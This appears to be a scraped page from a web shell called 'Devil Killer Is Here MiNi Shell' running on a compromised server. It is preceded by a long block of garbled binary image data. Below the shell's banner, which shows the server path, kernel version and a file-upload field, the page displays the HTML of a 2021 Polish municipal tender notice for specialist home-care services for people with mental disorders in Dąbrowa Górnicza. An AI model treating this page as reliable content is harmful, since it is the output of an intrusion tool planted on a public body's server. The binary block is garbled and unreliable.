JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211209/0030823301-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Świadczenie w miejscu zamieszkania specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w Gminie Dąbrowa Górnicza”<br/>NR - ZP/5 /53U/MOPS/2021 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI OŚRODEK POMOCY SPOŁECZNEJ W DĄBROWIE GÓRNICZEJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 003481572</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleja Józefa Piłsudskiego 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dąbrowa Górnicza</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@mops.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mops.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Świadczenie w miejscu zamieszkania specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w Gminie Dąbrowa Górnicza”<br/>NR - ZP/5 /53U/MOPS/2021 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f88044dd-58ea-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00308233</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000601/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Świadczenie w miejscu zamieszkania specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w Gminie Dąbrowa Górnicza</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mops-dg.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">4.1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002r. o świadczeniach usług drogą elektroniczną (Dz. U z 2020 r., poz. 344), tj przy użyciu Platformy przetargowej do elektronicznej obsługi zamówień (zwanej dalej: „Platformą”) dostępnej pod adresem:<br/>https://mops-dg.logintrade.net/rejestracja/ustawowe.html <br/><br/>w wierszu oznaczonym tytułem i znakiem niniejszego postępowania. <br/><br/>4.2 W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem Platformy przetargowej.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://mops-dg.logintrade.net/rejestracja/instrukcje.html</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych jest Miejski Ośrodek Pomocy Społecznej w Dąbrowie Górniczej z siedzibą w Dąbrowie Górniczej Adres: Aleja Józefa Piłsudskiego 2,<br/>41 – 300 Dąbrowa Górnicza, tel. (32) 262 40 40, fax: (32) 261 36 94, email: sekretariat@mops.com.pl reprezentowany przez Dyrektora.<br/> 2. Dane kontaktowe Inspektora Ochrony Danych w Miejskim Ośrodku Pomocy Społecznej w Dąbrowie Górniczej: iodo@mops.com.pl<br/> 3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu realizacji zadań Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej związanych z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, a także na podstawie art. 6 ust. 1 lit. b RODO tj. przetwarzanie jest niezbędne do wykonania umowy, której stroną jest osoba, której dane dotyczą, lub do podjęcia działań na żądanie osoby, której dane dotyczą, przed zawarciem umowy;<br/> Podstawą prawną przetwarzania Pani/Pana danych osobowych jest:<br/>- ustawa z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2021 r., poz. 1129), zwanej dalej „ustawą Pzp” - Zamówienie klasyczne udzielane zgodnie z art. 359 pkt 2 ustawy Prawo zamówień publicznych na usługi społeczne i inne szczególne usługi, o wartości mniejszej niż progi<br/>unijne – wartość zamówienia wyrażona w złotych jest mniejsza niż równowartość kwoty 750 000 <br/>euro, nie mniejsza jednak niż równowartość kwoty 130 000 złotych;<br/>- Rozporządzenie Ministra Rozwoju,Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy. <br/> - wewnętrzne regulacje w sprawie: <br/> Zarządzenie Nr DKPiO.013.26.2021 Dyrektora Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej z dnia 01.09.2021 r. w sprawie: Regulaminu udzielania zamówień zamówień klasycznych w Miejskim Ośrodku Pomocy Społecznej w Dąbrowie Górniczej, których wartość jest równa lub przekracza kwotę 130 000 zł. Pełny obowiązek informacyjny w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje usługi dostosowane do szczególnych potrzeb życiowych osób, wynikających z rodzaju ich schorzenia lub niepełnosprawności, świadczone przez osoby ze specjalistycznym przygotowaniem zawodowym. Ww. usługi są świadczone zgodnie z art.18 ust. 1 pkt 3, art. 50, art. 50a ustawy z dnia 12 marca 2004 r. o pomocy społecznej oraz Rozporządzeniem Ministra Polityki Społecznej z dnia 22.09.2005 r. w sprawie specjalistycznych usług opiekuńczych (Dz. U. z 2005 r. Nr 189 poz. 1598 ze zmianą z dnia 6 lipiec 2006 r., Nr 134, poz. 943).<br/>1. Szczegółowy opis przedmiotu zamówienia<br/>1. Do zadań Wykonawcy w zakresie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi dostosowanych do szczególnych potrzeb osób wymagających pomocy w formie specjalistycznych usług, wynikających z rodzaju ich schorzenia lub niepełnosprawności, świadczonych przez osoby ze specjalistycznym przygotowaniem zawodowym w szczególności należy:<br/>1) Uczenie i rozwijanie umiejętności niezbędnych do samodzielnego życia, w tym zwłaszcza:<br/>a) kształtowanie umiejętności zaspokajania podstawowych potrzeb życiowych i umiejętności społecznego funkcjonowania, motywowanie do aktywności, leczenia i rehabilitacji, prowadzenie treningów umiejętności samoobsługi i umiejętności społecznych oraz wspieranie, także w formie asystowania w codziennych czynnościach życiowych takich, jak:<br/>- samoobsługa, zwłaszcza wykonywanie czynności gospodarczych i porządkowych, w tym umiejętność utrzymania i prowadzenia domu,<br/>- dbałość o higienę i wygląd,<br/>- utrzymywanie kontaktów z domownikami, rówieśnikami, w miejscu nauki i pracy oraz ze społecznością lokalną,<br/>- wspólne organizowanie i spędzanie czasu wolnego,<br/>- korzystanie z usług różnych instytucji, <br/>b) interwencje i pomoc w życiu w rodzinie, w tym:<br/>- pomoc w radzeniu sobie w sytuacjach kryzysowych – poradnictwo specjalistyczne, interwencje kryzysowe, wsparcie psychologiczne, rozmowy terapeutyczne,<br/>- ułatwienie dostępu do edukacji i kultury,<br/>- doradztwo, koordynacja działań innych służb na rzecz rodziny, której członkiem jest osoba uzyskująca pomoc w formie specjalistycznych usług,<br/>- kształtowanie pozytywnych relacji osoby wspieranej z osobami bliskimi,<br/>- współpraca z rodziną – kształtowanie odpowiednich postaw wobec osoby chorującej, niepełnosprawnej,<br/>c) pomoc w załatwianiu spraw urzędowych, w tym:<br/>- w uzyskiwaniu świadczeń socjalnych, emerytalno - rentowych,<br/>- w wypełnianiu dokumentów urzędowych,<br/>d) wspieranie i pomoc w uzyskaniu zatrudnienia, w tym zwłaszcza:<br/>- w szukaniu informacji o pracy, pomoc w znalezieniu zatrudnienia albo alternatywnego zajęcia,<br/>w szczególności uczestnictwo w zajęciach warsztatów terapii zajęciowej, zakładach aktywności zawodowej, środowiskowych domach samopomocy, centrach i klubach integracji społecznej, klubach pracy,<br/>- w kompletowaniu dokumentów potrzebnych do zatrudnienia,<br/>- w przygotowaniu do rozmowy z pracodawcą, wspieranie i asystowanie w kontaktach z pracodawcą, <br/>- w rozwiązywaniu problemów psychicznych wynikających z pracy lub jej braku,<br/>e) pomoc w gospodarowaniu pieniędzmi, w tym:<br/>- nauka planowania budżetu, asystowanie przy ponoszeniu wydatków,<br/>- pomoc w uzyskaniu ulg w opłatach,<br/>- zwiększanie umiejętności gospodarowania własnym budżetem oraz usamodzielnianie finansowe.<br/><br/>2) Pielęgnacja - jako wspieranie procesu leczenia, w tym:<br/>a) pomoc w dostępie do świadczeń zdrowotnych,<br/>b) uzgadnianie i pilnowanie terminów wizyt lekarskich, badań diagnostycznych,<br/>c) pomoc w wykupywaniu lub zamawianiu leków w aptece,<br/>d) pilnowanie przyjmowania leków oraz obserwowanie ewentualnych skutków ubocznych ich stosowania,<br/>e) w szczególnie uzasadnionych przypadkach zmiana opatrunków, pomoc w użyciu środków pomocniczych i materiałów medycznych, przedmiotów ortopedycznych, a także w utrzymaniu higieny,<br/>f) pomoc w dotarciu do placówek służby zdrowia, <br/>g) pomoc w dotarciu do placówek rehabilitacyjnych.<br/><br/>3) Rehabilitacja fizyczna i usprawnienie zaburzonych funkcji organizmu w zakresie nieobjętym przepisami ustawy z dnia 27 sierpnia 2004 r. o oświadczeniach opieki zdrowotnej finansowanych ze środków publicznych <br/>a) zgodnie z zaleceniami lekarskimi lub specjalisty z zakresu rehabilitacji ruchowej lub fizjoterapii,<br/>b) współpraca ze specjalistami w zakresie wspierania psychologiczno - pedagogicznego i edukacyjno – terapeutycznego zmierzającego do wielostronnej aktywizacji osoby korzystającej ze specjalistycznych usług,<br/><br/>4) Pomoc mieszkaniowa , w tym:<br/>a) w uzyskaniu mieszkania, negocjowaniu i wnoszeniu opłat,<br/>b) w organizacji drobnych remontów, adaptacji, napraw, likwidacji barier architektonicznych,<br/>c) kształtowanie właściwych relacji osoby uzyskującej pomoc z sąsiadami i gospodarzem domu.<br/><br/>5) Zapewnienie dzieciom i młodzieży z zaburzeniami psychicznymi dostępu do zajęć rehabilitacyjnych<br/>i rewalidacyjno - wychowawczych, w wyjątkowych przypadkach, jeżeli nie mają możliwości uzyskania dostępu do zajęć określonych w ustawie z dnia 19 sierpnia 1994r. o ochronie zdrowia psychicznego.<br/><br/>2. Specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi mogą być świadczone w dni robocze, w dni świąteczne i wolne od pracy w miejscu zamieszkania lub czasowego pobytu osoby, której przyznano pomoc w formie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi.<br/>3. Do świadczenia specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi Wykonawca zobowiązany jest zatrudnić osoby sprawne fizycznie i intelektualnie, dbające o osobistą czystość i higienę, zdolne do wykonywania prac fizycznych, posiadające umiejętność utrzymywania kontaktów interpersonalnych.<br/>4. Zlecenie realizacji specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi na rzecz konkretnej osoby będzie przekazywane Wykonawcy drogą elektroniczną. Wykonawca otrzyma od pracownika Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej informację zawierającą dane klienta, tj. imię, nazwisko, adres zamieszkania, zakres świadczonych usług, wymiar godzin usług, okres świadczenia usług, tj. datę rozpoczęcia i datę zakończenia świadczenia usług, odpłatność klienta za godzinę świadczonych usług - zgodnie z którą obejmie klienta usługą w czasookresach i wymiarze godzin określonych w decyzji administracyjnej.<br/>5. W sytuacjach szczególnie uzasadnionych sytuacją klienta lub Wykonawcy dopuszcza się zmianę osoby świadczącej usługi w okresie obowiązywania decyzji przyznającej świadczenie na rzecz klienta po wcześniejszym uzgodnieniu tej okoliczności z Zamawiającym. W przypadku zmiany osoby sprawującej usługi u danego klienta Wykonawca zobowiązany jest poinformować o tym Zamawiającego pisemnie lub drogą elektroniczną nie później niż w dniu powzięcia informacji. Osoba zastępująca musi spełniać wymagania dla osób świadczących usługi określone w ogłoszeniu. Brak niezwłocznej reakcji Zamawiającego co do wskazanej osoby uznaje się za akceptację w tym zakresie.<br/>6. Za datę rozpoczęcia i zakończenia świadczenia specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi uważa się datę określoną w decyzji administracyjnej. <br/>7. W przypadku wstrzymania wykonywania usług (np. z powodu pobytu w szpitalu, wyjazdu do rodziny, umieszczenia w zakładzie pielęgnacyjnym, zgonu lub innej przyczyny) Wykonawca usługi jest zobowiązany do niezwłocznego zgłoszenia Zamawiającemu tego faktu, jednak nie później niż w ciągu 2- ch dni roboczych od momentu wstrzymania wykonywania usług.<br/>8. W przypadku konieczności wznowienia usługi Wykonawca usług jest również zobowiązany do niezwłocznego zgłoszenia Zamawiającemu tego faktu, jednak nie później niż w ciągu 2- ch dni roboczych od momentu wznowienia usługi.<br/>9. Wykonawca niezwłocznie po przystąpieniu do świadczenia usług zobowiązany jest poinformować pisemnie Zamawiającego o dniach i godzinach świadczenia usług i każdorazowo o ewentualnej zmianie terminów oraz podać informacje o osobie, która będzie te usługi wykonywać (imię i nazwisko).<br/>10. W wyjątkowych sytuacjach (w sytuacjach nagłych) np. powrót klienta ze szpitala, nagłe pogorszenie stanu zdrowia lub inne dopuszcza się możliwość rozpoczęcia świadczenia usług przed wydaniem decyzji administracyjnej na wniosek Zamawiającego, tj. zgłoszenie drogą elektroniczną. <br/>11. W wyjątkowych sytuacjach np. nagłe pogorszenie stanu zdrowia powrót klienta ze szpitala dopuszcza się możliwość zgłoszenia drogą elektroniczną zmiany ilości godzin świadczonych specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi określonych w decyzji administracyjnej.<br/>12. Wykonawca zobowiązany jest objąć klienta usługą w sytuacjach nagłych zgodnie z czasem reakcji zadeklarowanym na druku oferty, a w każdym innym przypadku w terminie do 12  godzin od chwili zgłoszenia przez Zamawiającego.<br/>13. Wykonawca zobowiązuje się do zachowania rzetelnej jakości świadczonych usług oraz ich terminowości, a także zapewni wyposażenie personelu w odpowiednie ubranie ochronne (np. fartuchy, rękawice gumowe, itp.) dostosowane do zakresu usług.<br/>14. Wykonawca zobowiązuje się do powiadamiania Zamawiającego o każdej zmianie sytuacji życiowej klienta, a także o pogorszeniu stanu zdrowia mających wpływ na realizację zadań wynikających z umowy.<br/>15. Wykonawca zobowiązuje się współpracować z pracownikami socjalnymi oraz innymi upoważnionymi pracownikami MOPS. Przez współpracę rozumie się wymianę informacji dotyczącą osób i rodzin objętych pomocą Ośrodka i korzystających ze wsparcia w formie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi.<br/>16. Wykonawca ponosi odpowiedzialność za staranność w wyborze osób, przy pomocy których będzie świadczył usługi objęte niniejszym zamówieniem oraz prawidłowość wykonywanych przez nie czynności i obowiązków w zakresie opisanym w niniejszym ogłoszeniu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85320000-8 - Usługi społeczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</p> <p class="mb-0">85312100-0 - Usługi opieki dziennej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 3.4. Zamawiający przewiduje możliwość zastosowania prawa opcji zgodnie z art 441 ust 1 uPzp.<br/>a) zakres podstawowy zamówienia obejmuje świadczenie w miejscu zamieszkania specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi do maksymalnej wartości określonej w umowie. <br/>b) część zamówienia, która będzie realizowana w ramach opcji obejmuje świadczenie w miejscu zamieszkania specjalistycznych usług opiekuńczych do maksymalnej wartości umowy powiększonej o dodatkowe środki finansowe. Wartość dodatkowych środków finansowych nie przekroczy 30% wartości środków zakresu podstawowego, o których mowa w lit „a”) i projekcie umowy. <br/>3.5. Zamawiający skorzysta z prawa opcji w przypadku:<br/>- zaangażowania całości środków finansowych zabezpieczonych w budżecie na realizację<br/>zamówienia podstawowego, określonych w umowie i posiadania dodatkowych środków finansowych na świadczenie specjalistycznych usług opiekuńczych.<br/>3.6. Realizacja opcjonalnej części zamówienia będzie następować po złożeniu przez Zamawiającego<br/>oświadczenia woli drogą elektroniczną, w którym określi wartość dodatkowych środków na świadczenie specjalistycznych usług opiekuńczych.<br/>3.7. Realizacja opcjonalnej części zamówienia będzie odbywać się w oparciu o cenę jednostkową brutto za jedną godzinę świadczenia specjalistycznych usług opiekuńczych zadeklarowaną przez<br/>Wykonawcę w Druku oferty (zał. nr 2 do ogłoszenia).<br/>3.8. Zasady dotyczące realizacji przedmiotu zamówienia stanowiącego opcję są jednakowe, jak dla zamówienia podstawowego.<br/>3.9. Część przedmiotu zamówienia stanowiąca opcję będzie realizowana w ilościach zgodnych<br/>z potrzebami Zamawiającego.<br/>3.10. Zamawiający informuje, że realizacja części zamówienia objętego opcją jest wyłącznie uprawnieniem Zamawiającego, z którego może, ale nie musi skorzystać. <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. W trakcie oceny ofert Zam. może żądać udzielania przez Wyk. wyjaśnień dotyczących treści złożonej oferty.<br/>2. Zam. poprawi w ofertach omyłki zgodnie z art. 223 ust. 2 ustawy Pzp.<br/>3.Zam. odrzuci złożoną ofertę , w przypadku wystąpienia przynajmniej jednej okoliczności , o których mowa w art. 226 ust 1 ustawy Pzp.<br/>4. W przypadku, gdy nie zostanie złożona żadna oferta niepodlegająca odrzuceniu postępowanie zostanie unieważnione. Zam. unieważni postępowanie także w innych przypadkach, o których wskazuje ustawa.<br/>5. Zam. przyzna zamówienie Wyk., który złoży ofertę niepodlegającą odrzuceniu, i która zostanie najwyżej oceniona (uzyska największą liczbę punktów przyznanych według kryteriów wyboru oferty określonych w niniejszej SWZ).<br/>2. Maks. ilość punktów jakie może otrzymać oferta za dane kryterium 100 pkt.<br/>3. Każde kryterium oceniane będzie wg punktacji w skali od 0 do 100 pkt pomnożone przez wagę.<br/>4. Najniższa oferowana cena brutto otrzyma maksymalną ilość punktów. Każda kolejna wyższa cena otrzyma ilość punktów wyliczoną wg proporcji matematycznej w stosunku do najniższej ceny ofertowej brutto. <br/>5. Punktacja za „Cena ofertowa brutto” będzie liczona matematycznie wg wzoru, gdzie: <br/>Pc – ilość punktów za kryterium cena <br/>CN – najniższa cena ofertowa brutto <br/>Cbo - cena ofertowa brutto<br/><br/> CN najniższa cena ofertowa brutto <br/>Pc = --------------------------------------------------------- X 100 pkt 